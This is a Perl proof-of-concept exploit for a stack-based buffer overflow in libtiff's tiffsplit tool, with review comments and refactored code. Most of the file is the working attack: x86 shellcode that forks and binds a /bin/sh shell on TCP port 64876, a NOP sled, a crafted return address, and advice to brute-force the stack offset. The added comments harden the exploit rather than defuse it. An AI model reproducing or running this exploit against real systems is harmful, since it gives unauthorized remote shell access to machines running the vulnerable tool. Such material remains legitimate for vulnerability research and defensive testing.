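#!/usr/bin/perl
# tiffsplit argv[2] stack-based buffer overflow (proof of concept).
#
# Builds an oversized second argument for tiffsplit: a NOP sled, a
# fork + portbind payload (listens on 64876/tcp) and a 4-byte return
# address placed where the saved EIP is overwritten ($len bytes in).
# The return address is $stack - <offset>; the original author reports
# offsets roughly between 5000000 and 5500000 working on their box
# (EIP: 0xbfb1ba7a) and suggests brute-forcing the offset with the
# accompanying brute.sh.
#
# nitrousenador[at]gmail[dot]com
#
# Review notes:
#  - $TIFFSPLIT, $IMG, $len and $stack are environment-specific values
#    taken verbatim from the original; adjust them for the target.
#  - A fixed stack top plus code execution from the stack presumably
#    assumes a target without ASLR/NX - confirm before relying on it.
#  - argv strings are C strings: a 0x00 byte anywhere in the payload
#    would silently truncate it, so the payload is now refused in that
#    case instead of failing quietly.

use strict;
use warnings;

my $TIFFSPLIT = "/usr/local/bin/tiffsplit";
my $IMG       = "./fs.tif";

# extra
# PORTBIND 64876/tcp
# fork functionality - nitrous
# port bind - benn
#
# Leading bytes are xor eax,eax / add eax,2 / int 0x80 (fork), then
# test eax,eax / jnz forward, which appears to land on the trailing
# xor eax,eax / inc eax / int 0x80 exit stub for the parent; the child
# sets up the listening socket and execs /bin/sh.  The bytes fd 6c
# pushed before bind() are the port in network byte order (0xfd6c =
# 64876).  No 0x00 byte in the sequence.
my $opc0dez =
    "\x31\xc0\x83\xc0\x02\xcd\x80\x85\xc0\x75\x64\x6a" .
    "\x66\x58\x6a\x01\x5b\x31\xc9\x51\x6a\x01\x6a\x02" .
    "\x89\xe1\xcd\x80\x31\xd2\x52\x66\x68\xfd\x6c\x66" .
    "\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6" .
    "\x6a\x02\x5b\x6a\x66\x58\xcd\x80\x6a\x66\x58\x6a" .
    "\x04\x5b\xcd\x80\x31\xc9\x51\x51\x56\x89\xe1\x6a" .
    "\x05\x5b\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\xb0" .
    "\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f" .
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" .
    "\xe1\xcd\x80\x31\xc0\xfe\xc0\xcd\x80";

my $len   = 1101;        # bytes needed to reach the saved EIP
my $stack = 0xbffffffa;  # stack top used as the base for the return address
my $nop   = "\x90";

# build_payload(OFFSET) -> string
#
# Returns the $len-byte argument: NOP sled, shellcode, then the
# little-endian 32-bit return address ($stack - OFFSET).
#
# Dies when OFFSET is not a non-negative integer, when the resulting
# address does not fit in 32 bits, when the shellcode does not fit in
# $len bytes, or when the payload would contain a NUL byte (exec()
# passes argv as C strings, so the target would only see a prefix).
sub build_payload {
    my ($offset) = @_;

    die "offset must be a non-negative integer\n"
        unless defined $offset && $offset =~ /\A\d+\z/;

    my $target = $stack - $offset;
    die sprintf("return address 0x%x is outside the 32-bit range\n", $target)
        if $target < 0 || $target > 0xffffffff;

    # 'V' is an explicit little-endian 32-bit value; the original used
    # 'l' (native byte order), which only matches the x86 target by
    # virtue of running on the same host.
    my $ret = pack('V', $target);

    my $sled_len = $len - length($opc0dez) - length($ret);
    die "shellcode too long for a $len-byte payload\n" if $sled_len < 0;

    my $payload = ($nop x $sled_len) . $opc0dez . $ret;
    die "payload contains a NUL byte; argv would be truncated\n"
        if index($payload, "\x00") >= 0;

    return $payload;
}

# main(@ARGV): build the payload and exec the target with it as argv[2].
# Prints a usage message and exits with status 255 (exit -1, as in the
# original) when the single offset argument is missing.
sub main {
    my @args = @_;

    if (@args != 1) {
        # The original printed "Usage: $0 \n" with no argument name.
        print STDERR "Usage: ", $0, " <offset>\n";
        exit -1;
    }

    my $offset  = $args[0];
    my $payload = build_payload($offset);

    printf "Jumping to 0x%lx\n", ($stack - $offset);

    # List-form exec: no shell is involved, the raw payload goes
    # straight into argv[2] of tiffsplit.
    exec($TIFFSPLIT, $IMG, $payload) or die "Cannot execute $TIFFSPLIT\n";
}

# Only run when invoked as a script, so the payload builder can be
# loaded and tested without exec()ing the target.
main(@ARGV) unless caller;

1;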